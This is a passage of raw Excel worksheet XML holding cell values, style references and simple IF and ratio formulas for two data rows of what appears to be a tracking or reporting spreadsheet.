      <c r="MX22" s="127"/>
      <c r="MY22" s="127"/>
      <c r="MZ22" s="127"/>
      <c r="NA22" s="127"/>
      <c r="NB22" s="127"/>
      <c r="NC22" s="127"/>
      <c r="ND22" s="127"/>
      <c r="NE22" s="127"/>
      <c r="NF22" s="127"/>
      <c r="NG22" s="127"/>
      <c r="NH22" s="127"/>
      <c r="NI22" s="127"/>
      <c r="NJ22" s="127"/>
      <c r="NK22" s="127"/>
      <c r="NL22" s="127"/>
      <c r="NM22" s="127"/>
      <c r="NN22" s="127"/>
      <c r="NO22" s="127"/>
      <c r="NP22" s="127"/>
      <c r="NQ22" s="127"/>
      <c r="NR22" s="127"/>
      <c r="NS22" s="127"/>
      <c r="NT22" s="127"/>
      <c r="NU22" s="127"/>
      <c r="NV22" s="127"/>
      <c r="NW22" s="127"/>
      <c r="NX22" s="127"/>
      <c r="NY22" s="127"/>
    </row>
    <row r="23" ht="153.75" customHeight="1">
      <c r="B23" s="89" t="s">
        <v>558</v>
      </c>
      <c r="C23" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D23" s="90" t="s">
        <v>559</v>
      </c>
      <c r="E23" s="90" t="s">
        <v>560</v>
      </c>
      <c r="F23" s="90" t="s">
        <v>561</v>
      </c>
      <c r="G23" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H23" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I23" s="92" t="s">
        <v>562</v>
      </c>
      <c r="J23" s="92" t="s">
        <v>563</v>
      </c>
      <c r="K23" s="92" t="s">
        <v>564</v>
      </c>
      <c r="L23" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M23" s="93">
        <v>911.0</v>
      </c>
      <c r="N23" s="93">
        <v>450.0</v>
      </c>
      <c r="O23" s="93">
        <v>1.0</v>
      </c>
      <c r="P23" s="93">
        <v>450.0</v>
      </c>
      <c r="Q23" s="93">
        <f t="shared" si="70"/>
        <v>451</v>
      </c>
      <c r="R23" s="93">
        <v>450.0</v>
      </c>
      <c r="S23" s="93">
        <v>1.0</v>
      </c>
      <c r="T23" s="94" t="s">
        <v>565</v>
      </c>
      <c r="U23" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V23" s="126" t="s">
        <v>566</v>
      </c>
      <c r="W23" s="96" t="s">
        <v>567</v>
      </c>
      <c r="X23" s="97" t="s">
        <v>568</v>
      </c>
      <c r="Y23" s="96" t="s">
        <v>569</v>
      </c>
      <c r="Z23" s="97" t="s">
        <v>570</v>
      </c>
      <c r="AA23" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB23" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC23" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD23" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE23" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF23" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG23" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH23" s="99" t="s">
        <v>571</v>
      </c>
      <c r="AI23" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ23" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK23" s="100">
        <v>1394.0</v>
      </c>
      <c r="AL23" s="100">
        <v>1.0</v>
      </c>
      <c r="AM23" s="100">
        <v>18.0</v>
      </c>
      <c r="AN23" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO23" s="100">
        <v>1394.0</v>
      </c>
      <c r="AP23" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ23" s="100">
        <v>18.0</v>
      </c>
      <c r="AR23" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS23" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT23" s="100" t="str">
        <f t="shared" ref="AT23:AT25" si="74">IF(AR23="-",AS23,AR23)</f>
        <v>-</v>
      </c>
      <c r="AU23" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV23" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW23" s="100">
        <v>1394.0</v>
      </c>
      <c r="AX23" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY23" s="100">
        <v>1.0</v>
      </c>
      <c r="AZ23" s="100">
        <v>18.0</v>
      </c>
      <c r="BA23" s="102">
        <v>913.0</v>
      </c>
      <c r="BB23" s="102">
        <v>18.0</v>
      </c>
      <c r="BC23" s="102">
        <v>18.0</v>
      </c>
      <c r="BD23" s="102">
        <v>18.0</v>
      </c>
      <c r="BE23" s="102">
        <v>18.0</v>
      </c>
      <c r="BF23" s="102">
        <v>0.0</v>
      </c>
      <c r="BG23" s="102">
        <v>18.0</v>
      </c>
      <c r="BH23" s="102">
        <v>18.0</v>
      </c>
      <c r="BI23" s="102">
        <v>18.0</v>
      </c>
      <c r="BJ23" s="102">
        <v>18.0</v>
      </c>
      <c r="BK23" s="102">
        <v>18.0</v>
      </c>
      <c r="BL23" s="103">
        <f t="shared" si="3"/>
        <v>0.04</v>
      </c>
      <c r="BM23" s="103">
        <f t="shared" si="4"/>
        <v>0.04</v>
      </c>
      <c r="BN23" s="103">
        <f t="shared" si="5"/>
        <v>0.04</v>
      </c>
      <c r="BO23" s="103">
        <f t="shared" si="6"/>
        <v>0.04</v>
      </c>
      <c r="BP23" s="103">
        <f t="shared" si="7"/>
        <v>0.04</v>
      </c>
      <c r="BQ23" s="103">
        <f t="shared" si="8"/>
        <v>0.04</v>
      </c>
      <c r="BR23" s="103">
        <f t="shared" si="9"/>
        <v>0.04</v>
      </c>
      <c r="BS23" s="103">
        <f t="shared" si="10"/>
        <v>0.04</v>
      </c>
      <c r="BT23" s="103">
        <f t="shared" si="11"/>
        <v>0.04</v>
      </c>
      <c r="BU23" s="103">
        <f t="shared" ref="BU23:BU120" si="75">(BE23+BF23)/(N23+O23)</f>
        <v>0.0399113082</v>
      </c>
      <c r="BV23" s="103">
        <f t="shared" ref="BV23:BV120" si="76">IF(OR(BN23=0,BN23="-"),0,1)</f>
        <v>1</v>
      </c>
      <c r="BW23" s="143" t="s">
        <v>572</v>
      </c>
      <c r="BX23" s="143">
        <v>4.0</v>
      </c>
      <c r="BY23" s="143">
        <v>474.0</v>
      </c>
      <c r="BZ23" s="144" t="s">
        <v>12</v>
      </c>
      <c r="CA23" s="104" t="s">
        <v>572</v>
      </c>
      <c r="CB23" s="104">
        <v>4.0</v>
      </c>
      <c r="CC23" s="104">
        <v>474.0</v>
      </c>
      <c r="CD23" s="104">
        <v>2035480.0</v>
      </c>
      <c r="CE23" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF23" s="104">
        <f t="shared" si="73"/>
        <v>2035480</v>
      </c>
      <c r="CG23" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH23" s="104">
        <v>2035480.0</v>
      </c>
      <c r="CI23" s="104" t="s">
        <v>573</v>
      </c>
      <c r="CJ23" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK23" s="104">
        <v>3.0</v>
      </c>
      <c r="CL23" s="104">
        <v>18.0</v>
      </c>
      <c r="CM23" s="105">
        <v>911.0</v>
      </c>
      <c r="CN23" s="105">
        <v>450.0</v>
      </c>
      <c r="CO23" s="105">
        <v>474.0</v>
      </c>
      <c r="CP23" s="105">
        <v>18.0</v>
      </c>
      <c r="CQ23" s="105">
        <v>456.0</v>
      </c>
      <c r="CR23" s="105">
        <v>474.0</v>
      </c>
      <c r="CS23" s="105">
        <v>450.0</v>
      </c>
      <c r="CT23" s="105">
        <v>0.0</v>
      </c>
      <c r="CU23" s="105">
        <v>450.0</v>
      </c>
      <c r="CV23" s="105">
        <v>450.0</v>
      </c>
      <c r="CW23" s="105">
        <v>450.0</v>
      </c>
      <c r="CX23" s="105">
        <v>474.0</v>
      </c>
      <c r="CY23" s="105">
        <v>18.0</v>
      </c>
      <c r="CZ23" s="105">
        <v>456.0</v>
      </c>
      <c r="DA23" s="105">
        <v>474.0</v>
      </c>
      <c r="DB23" s="106">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="DC23" s="106">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="DD23" s="106">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="DE23" s="106">
        <f t="shared" si="18"/>
        <v>1.053333333</v>
      </c>
      <c r="DF23" s="106">
        <f t="shared" si="19"/>
        <v>1.053333333</v>
      </c>
      <c r="DG23" s="106">
        <f t="shared" si="20"/>
        <v>1</v>
      </c>
      <c r="DH23" s="106">
        <f t="shared" si="21"/>
        <v>1.053333333</v>
      </c>
      <c r="DI23" s="106">
        <f t="shared" si="22"/>
        <v>1.053333333</v>
      </c>
      <c r="DJ23" s="106">
        <f t="shared" si="23"/>
        <v>1</v>
      </c>
      <c r="DK23" s="107">
        <f t="shared" ref="DK23:DK58" si="77">(CS23+CT23)/(N23+O23)</f>
        <v>0.9977827051</v>
      </c>
      <c r="DL23" s="106">
        <f t="shared" ref="DL23:DL58" si="78">IF(AND(OR(DD23=0,DD23="-"),DK23=0),0,1)</f>
        <v>1</v>
      </c>
      <c r="DM23" s="108" t="s">
        <v>574</v>
      </c>
      <c r="DN23" s="108">
        <v>5.0</v>
      </c>
      <c r="DO23" s="108">
        <v>478.0</v>
      </c>
      <c r="DP23" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ23" s="108" t="s">
        <v>574</v>
      </c>
      <c r="DR23" s="108">
        <v>5.0</v>
      </c>
      <c r="DS23" s="108">
        <v>478.0</v>
      </c>
      <c r="DT23" s="108" t="s">
        <v>575</v>
      </c>
      <c r="DU23" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV23" s="108" t="str">
        <f>IF(DT23="-",DU23,DT23)</f>
        <v>2035480, 20619</v>
      </c>
      <c r="DW23" s="108" t="s">
        <v>575</v>
      </c>
      <c r="DX23" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY23" s="108" t="s">
        <v>576</v>
      </c>
      <c r="DZ23" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA23" s="108">
        <v>3.0</v>
      </c>
      <c r="EB23" s="108">
        <v>480.0</v>
      </c>
      <c r="EC23" s="109">
        <v>913.0</v>
      </c>
      <c r="ED23" s="109">
        <v>450.0</v>
      </c>
      <c r="EE23" s="109">
        <v>475.0</v>
      </c>
      <c r="EF23" s="109">
        <v>22.0</v>
      </c>
      <c r="EG23" s="109">
        <v>456.0</v>
      </c>
      <c r="EH23" s="109">
        <v>479.0</v>
      </c>
      <c r="EI23" s="109">
        <v>450.0</v>
      </c>
      <c r="EJ23" s="109">
        <v>0.0</v>
      </c>
      <c r="EK23" s="109">
        <v>450.0</v>
      </c>
      <c r="EL23" s="109">
        <v>450.0</v>
      </c>
      <c r="EM23" s="109">
        <v>450.0</v>
      </c>
      <c r="EN23" s="109">
        <v>475.0</v>
      </c>
      <c r="EO23" s="109">
        <v>22.0</v>
      </c>
      <c r="EP23" s="109">
        <v>456.0</v>
      </c>
      <c r="EQ23" s="109">
        <v>479.0</v>
      </c>
      <c r="ER23" s="110">
        <f t="shared" si="27"/>
        <v>1</v>
      </c>
      <c r="ES23" s="110">
        <f t="shared" si="28"/>
        <v>1</v>
      </c>
      <c r="ET23" s="110">
        <f t="shared" si="29"/>
        <v>1</v>
      </c>
      <c r="EU23" s="110">
        <f t="shared" si="30"/>
        <v>1.055555556</v>
      </c>
      <c r="EV23" s="110">
        <f t="shared" si="31"/>
        <v>1.055555556</v>
      </c>
      <c r="EW23" s="110">
        <f t="shared" si="32"/>
        <v>1</v>
      </c>
      <c r="EX23" s="110">
        <f t="shared" si="33"/>
        <v>1.064444444</v>
      </c>
      <c r="EY23" s="110">
        <f t="shared" si="34"/>
        <v>1.064444444</v>
      </c>
      <c r="EZ23" s="110">
        <f t="shared" si="35"/>
        <v>1</v>
      </c>
      <c r="FA23" s="110">
        <f t="shared" ref="FA23:FA58" si="79">(EI23+EJ23)/(N23+O23)</f>
        <v>0.9977827051</v>
      </c>
      <c r="FB23" s="110">
        <f t="shared" ref="FB23:FB58" si="80">IF(AND(OR(ET23=0,ET23="-"),FA23=0),0,1)</f>
        <v>1</v>
      </c>
      <c r="FC23" s="111" t="s">
        <v>577</v>
      </c>
      <c r="FD23" s="111">
        <v>10.0</v>
      </c>
      <c r="FE23" s="111">
        <v>1395.0</v>
      </c>
      <c r="FF23" s="101" t="s">
        <v>578</v>
      </c>
      <c r="FG23" s="111" t="s">
        <v>579</v>
      </c>
      <c r="FH23" s="111">
        <v>7.0</v>
      </c>
      <c r="FI23" s="111">
        <v>1386.0</v>
      </c>
      <c r="FJ23" s="111" t="s">
        <v>580</v>
      </c>
      <c r="FK23" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL23" s="111" t="str">
        <f t="shared" si="69"/>
        <v>2002752, 2002749, 20619</v>
      </c>
      <c r="FM23" s="111" t="s">
        <v>581</v>
      </c>
      <c r="FN23" s="111" t="s">
        <v>578</v>
      </c>
      <c r="FO23" s="111" t="s">
        <v>573</v>
      </c>
      <c r="FP23" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ23" s="111">
        <v>3.0</v>
      </c>
      <c r="FR23" s="111">
        <v>2300.0</v>
      </c>
      <c r="FS23" s="112">
        <v>911.0</v>
      </c>
      <c r="FT23" s="112">
        <v>878.0</v>
      </c>
      <c r="FU23" s="112">
        <v>932.0</v>
      </c>
      <c r="FV23" s="112">
        <v>22.0</v>
      </c>
      <c r="FW23" s="112">
        <v>1373.0</v>
      </c>
      <c r="FX23" s="112">
        <v>1395.0</v>
      </c>
      <c r="FY23" s="112">
        <v>450.0</v>
      </c>
      <c r="FZ23" s="112">
        <v>0.0</v>
      </c>
      <c r="GA23" s="112">
        <v>450.0</v>
      </c>
      <c r="GB23" s="112">
        <v>450.0</v>
      </c>
      <c r="GC23" s="112">
        <v>878.0</v>
      </c>
      <c r="GD23" s="112">
        <v>929.0</v>
      </c>
      <c r="GE23" s="112">
        <v>22.0</v>
      </c>
      <c r="GF23" s="112">
        <v>1365.0</v>
      </c>
      <c r="GG23" s="112">
        <v>1387.0</v>
      </c>
      <c r="GH23" s="113">
        <f t="shared" si="39"/>
        <v>1.951111111</v>
      </c>
      <c r="GI23" s="113">
        <f t="shared" si="40"/>
        <v>1.951111111</v>
      </c>
      <c r="GJ23" s="113">
        <f t="shared" si="41"/>
        <v>1</v>
      </c>
      <c r="GK23" s="113">
        <f t="shared" si="42"/>
        <v>2.071111111</v>
      </c>
      <c r="GL23" s="113">
        <f t="shared" si="43"/>
        <v>2.064444444</v>
      </c>
      <c r="GM23" s="113">
        <f t="shared" si="44"/>
        <v>1</v>
      </c>
      <c r="GN23" s="113">
        <f t="shared" si="45"/>
        <v>3.1</v>
      </c>
      <c r="GO23" s="113">
        <f t="shared" si="46"/>
        <v>3.082222222</v>
      </c>
      <c r="GP23" s="113">
        <f t="shared" si="47"/>
        <v>1</v>
      </c>
      <c r="GQ23" s="114">
        <f t="shared" ref="GQ23:GQ58" si="81">(FY23+FZ23)/(N23+O23)</f>
        <v>0.9977827051</v>
      </c>
      <c r="GR23" s="113">
        <f t="shared" ref="GR23:GR58" si="82">IF(AND(OR(GJ23=0,GJ23="-"),GQ23=0),0,1)</f>
        <v>1</v>
      </c>
      <c r="GS23" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT23" s="94" t="s">
        <v>582</v>
      </c>
      <c r="GU23" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV23" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW23" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX23" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY23" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ23" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA23" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB23" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC23" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD23" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE23" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF23" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG23" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH23" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI23" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ23" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK23" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL23" s="93">
        <v>911.0</v>
      </c>
      <c r="HM23" s="93">
        <f t="shared" ref="HM23:HM139" si="83">HN23+HO23</f>
        <v>0</v>
      </c>
      <c r="HN23" s="93">
        <v>0.0</v>
      </c>
      <c r="HO23" s="93">
        <v>0.0</v>
      </c>
      <c r="HP23" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ23" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR23" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS23" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT23" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU23" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV23" s="119" t="s">
        <v>583</v>
      </c>
      <c r="HW23" s="119">
        <v>7.0</v>
      </c>
      <c r="HX23" s="119">
        <v>941.0</v>
      </c>
      <c r="HY23" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ23" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA23" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB23" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC23" s="120" t="s">
        <v>584</v>
      </c>
      <c r="ID23" s="120" t="s">
        <v>585</v>
      </c>
      <c r="IE23" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF23" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG23" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH23" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II23" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ23" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK23" s="99">
        <v>878.0</v>
      </c>
      <c r="IL23" s="99">
        <v>450.0</v>
      </c>
      <c r="IM23" s="121">
        <f t="shared" si="57"/>
        <v>450</v>
      </c>
      <c r="IN23" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO23" s="98">
        <v>451.0</v>
      </c>
      <c r="IP23" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ23" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR23" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS23" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT23" s="127"/>
      <c r="IU23" s="127"/>
      <c r="IV23" s="127"/>
      <c r="IW23" s="127"/>
      <c r="IX23" s="127"/>
      <c r="IY23" s="127"/>
      <c r="IZ23" s="127"/>
      <c r="JA23" s="127"/>
      <c r="JB23" s="127"/>
      <c r="JC23" s="127"/>
      <c r="JD23" s="127"/>
      <c r="JE23" s="127"/>
      <c r="JF23" s="127"/>
      <c r="JG23" s="127"/>
      <c r="JH23" s="127"/>
      <c r="JI23" s="127"/>
      <c r="JJ23" s="127"/>
      <c r="JK23" s="127"/>
      <c r="JL23" s="127"/>
      <c r="JM23" s="127"/>
      <c r="JN23" s="127"/>
      <c r="JO23" s="127"/>
      <c r="JP23" s="127"/>
      <c r="JQ23" s="127"/>
      <c r="JR23" s="127"/>
      <c r="JS23" s="127"/>
      <c r="JT23" s="127"/>
      <c r="JU23" s="127"/>
      <c r="JV23" s="127"/>
      <c r="JW23" s="127"/>
      <c r="JX23" s="127"/>
      <c r="JY23" s="127"/>
      <c r="JZ23" s="127"/>
      <c r="KA23" s="127"/>
      <c r="KB23" s="127"/>
      <c r="KC23" s="127"/>
      <c r="KD23" s="127"/>
      <c r="KE23" s="127"/>
      <c r="KF23" s="127"/>
      <c r="KG23" s="127"/>
      <c r="KH23" s="127"/>
      <c r="KI23" s="127"/>
      <c r="KJ23" s="127"/>
      <c r="KK23" s="127"/>
      <c r="KL23" s="127"/>
      <c r="KM23" s="127"/>
      <c r="KN23" s="127"/>
      <c r="KO23" s="127"/>
      <c r="KP23" s="127"/>
      <c r="KQ23" s="127"/>
      <c r="KR23" s="127"/>
      <c r="KS23" s="127"/>
      <c r="KT23" s="127"/>
      <c r="KU23" s="127"/>
      <c r="KV23" s="127"/>
      <c r="KW23" s="127"/>
      <c r="KX23" s="127"/>
      <c r="KY23" s="127"/>
      <c r="KZ23" s="127"/>
      <c r="LA23" s="127"/>
      <c r="LB23" s="127"/>
      <c r="LC23" s="127"/>
      <c r="LD23" s="127"/>
      <c r="LE23" s="127"/>
      <c r="LF23" s="127"/>
      <c r="LG23" s="127"/>
      <c r="LH23" s="127"/>
      <c r="LI23" s="127"/>
      <c r="LJ23" s="127"/>
      <c r="LK23" s="127"/>
      <c r="LL23" s="127"/>
      <c r="LM23" s="127"/>
      <c r="LN23" s="127"/>
      <c r="LO23" s="127"/>
      <c r="LP23" s="127"/>
      <c r="LQ23" s="127"/>
      <c r="LR23" s="127"/>
      <c r="LS23" s="127"/>
      <c r="LT23" s="127"/>
      <c r="LU23" s="127"/>
      <c r="LV23" s="127"/>
      <c r="LW23" s="127"/>
      <c r="LX23" s="127"/>
      <c r="LY23" s="127"/>
      <c r="LZ23" s="127"/>
      <c r="MA23" s="127"/>
      <c r="MB23" s="127"/>
      <c r="MC23" s="127"/>
      <c r="MD23" s="127"/>
      <c r="ME23" s="127"/>
      <c r="MF23" s="127"/>
      <c r="MG23" s="127"/>
      <c r="MH23" s="127"/>
      <c r="MI23" s="127"/>
      <c r="MJ23" s="127"/>
      <c r="MK23" s="127"/>
      <c r="ML23" s="127"/>
      <c r="MM23" s="127"/>
      <c r="MN23" s="127"/>
      <c r="MO23" s="127"/>
      <c r="MP23" s="127"/>
      <c r="MQ23" s="127"/>
      <c r="MR23" s="127"/>
      <c r="MS23" s="127"/>
      <c r="MT23" s="127"/>
      <c r="MU23" s="127"/>
      <c r="MV23" s="127"/>
      <c r="MW23" s="127"/>
      <c r="MX23" s="127"/>
      <c r="MY23" s="127"/>
      <c r="MZ23" s="127"/>
      <c r="NA23" s="127"/>
      <c r="NB23" s="127"/>
      <c r="NC23" s="127"/>
      <c r="ND23" s="127"/>
      <c r="NE23" s="127"/>
      <c r="NF23" s="127"/>
      <c r="NG23" s="127"/>
      <c r="NH23" s="127"/>
      <c r="NI23" s="127"/>
      <c r="NJ23" s="127"/>
      <c r="NK23" s="127"/>
      <c r="NL23" s="127"/>
      <c r="NM23" s="127"/>
      <c r="NN23" s="127"/>
      <c r="NO23" s="127"/>
      <c r="NP23" s="127"/>
      <c r="NQ23" s="127"/>
      <c r="NR23" s="127"/>
      <c r="NS23" s="127"/>
      <c r="NT23" s="127"/>
      <c r="NU23" s="127"/>
      <c r="NV23" s="127"/>
      <c r="NW23" s="127"/>
      <c r="NX23" s="127"/>
      <c r="NY23" s="127"/>
    </row>
    <row r="24" ht="153.75" customHeight="1">
      <c r="B24" s="89" t="s">
        <v>292</v>
      </c>
      <c r="C24" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D24" s="90" t="s">
        <v>293</v>
      </c>
      <c r="E24" s="90" t="s">
        <v>586</v>
      </c>
      <c r="F24" s="90" t="s">
        <v>587</v>
      </c>
      <c r="G24" s="91" t="s">
        <v>588</v>
      </c>
      <c r="H24" s="90" t="s">
        <v>589</v>
      </c>
      <c r="I24" s="92" t="s">
        <v>590</v>
      </c>
      <c r="J24" s="92" t="s">
        <v>489</v>
      </c>
      <c r="K24" s="92" t="s">
        <v>591</v>
      </c>
      <c r="L24" s="93" t="s">
        <v>317</v>
      </c>
      <c r="M24" s="93">
        <v>9.0</v>
      </c>
      <c r="N24" s="93">
        <v>1.0</v>
      </c>
      <c r="O24" s="93">
        <v>0.0</v>
      </c>
      <c r="P24" s="93">
        <v>1.0</v>
      </c>
      <c r="Q24" s="93">
        <f t="shared" si="70"/>
        <v>1</v>
      </c>
      <c r="R24" s="93">
        <v>1.0</v>
      </c>
      <c r="S24" s="93">
        <v>0.0</v>
      </c>
      <c r="T24" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U24" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V24" s="126" t="s">
        <v>592</v>
      </c>
      <c r="W24" s="96" t="s">
        <v>593</v>
      </c>
      <c r="X24" s="97" t="s">
        <v>594</v>
      </c>
      <c r="Y24" s="96" t="s">
        <v>595</v>
      </c>
      <c r="Z24" s="96" t="s">
        <v>596</v>
      </c>
      <c r="AA24" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB24" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC24" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD24" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE24" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF24" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AG24" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH24" s="99" t="s">
        <v>597</v>
      </c>
      <c r="AI24" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ24" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK24" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL24" s="100">
        <v>0.0</v>
      </c>
      <c r="AM24" s="100">
        <v>0.0</v>
      </c>
      <c r="AN24" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO24" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP24" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ24" s="100">
        <v>0.0</v>
      </c>
      <c r="AR24" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS24" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT24" s="100" t="str">
        <f t="shared" si="74"/>
        <v>-</v>
      </c>
      <c r="AU24" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV24" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW24" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX24" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY24" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ24" s="100">
        <v>0.0</v>
      </c>
      <c r="BA24" s="102">
        <v>9.0</v>
      </c>
      <c r="BB24" s="102">
        <v>0.0</v>
      </c>
      <c r="BC24" s="102">
        <v>0.0</v>
      </c>
      <c r="BD24" s="102">
        <v>0.0</v>
      </c>
      <c r="BE24" s="102">
        <v>0.0</v>
      </c>
      <c r="BF24" s="102">
        <v>0.0</v>
      </c>
      <c r="BG24" s="102">
        <v>0.0</v>
      </c>
      <c r="BH24" s="102">
        <v>0.0</v>
      </c>
      <c r="BI24" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ24" s="102">
        <v>0.0</v>
      </c>
      <c r="BK24" s="102">
        <v>0.0</v>
      </c>
      <c r="BL24" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM24" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN24" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO24" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP24" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ24" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR24" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS24" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT24" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU24" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV24" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW24" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX24" s="104">
        <v>0.0</v>
      </c>
      <c r="BY24" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ24" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA24" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB24" s="104">
        <v>0.0</v>
      </c>
      <c r="CC24" s="104">
        <v>0.0</v>
      </c>
      <c r="CD24" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE24" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF24" s="104" t="str">
        <f t="shared" si="73"/>
        <v>-</v>
      </c>
      <c r="CG24" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH24" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI24" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ24" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK24" s="104">
        <v>0.0</v>
      </c>
      <c r="CL24" s="104">
        <v>0.0</v>
      </c>
      <c r="CM24" s="105">
        <v>8.0</v>
      </c>
      <c r="CN24" s="105">
        <v>0.0</v>
      </c>
      <c r="CO24" s="105">
        <v>0.0</v>
      </c>
      <c r="CP24" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ24" s="105">
        <v>0.0</v>
      </c>
      <c r="CR24" s="105">
        <v>0.0</v>
      </c>
      <c r="CS24" s="105">
        <v>0.0</v>
      </c>
      <c r="CT24" s="105">
        <v>0.0</v>
      </c>
      <c r="CU24" s="105">
        <v>0.0</v>
      </c>
      <c r="CV24" s="105">
        <v>0.0</v>
      </c>
      <c r="CW24" s="105">
        <v>0.0</v>
      </c>
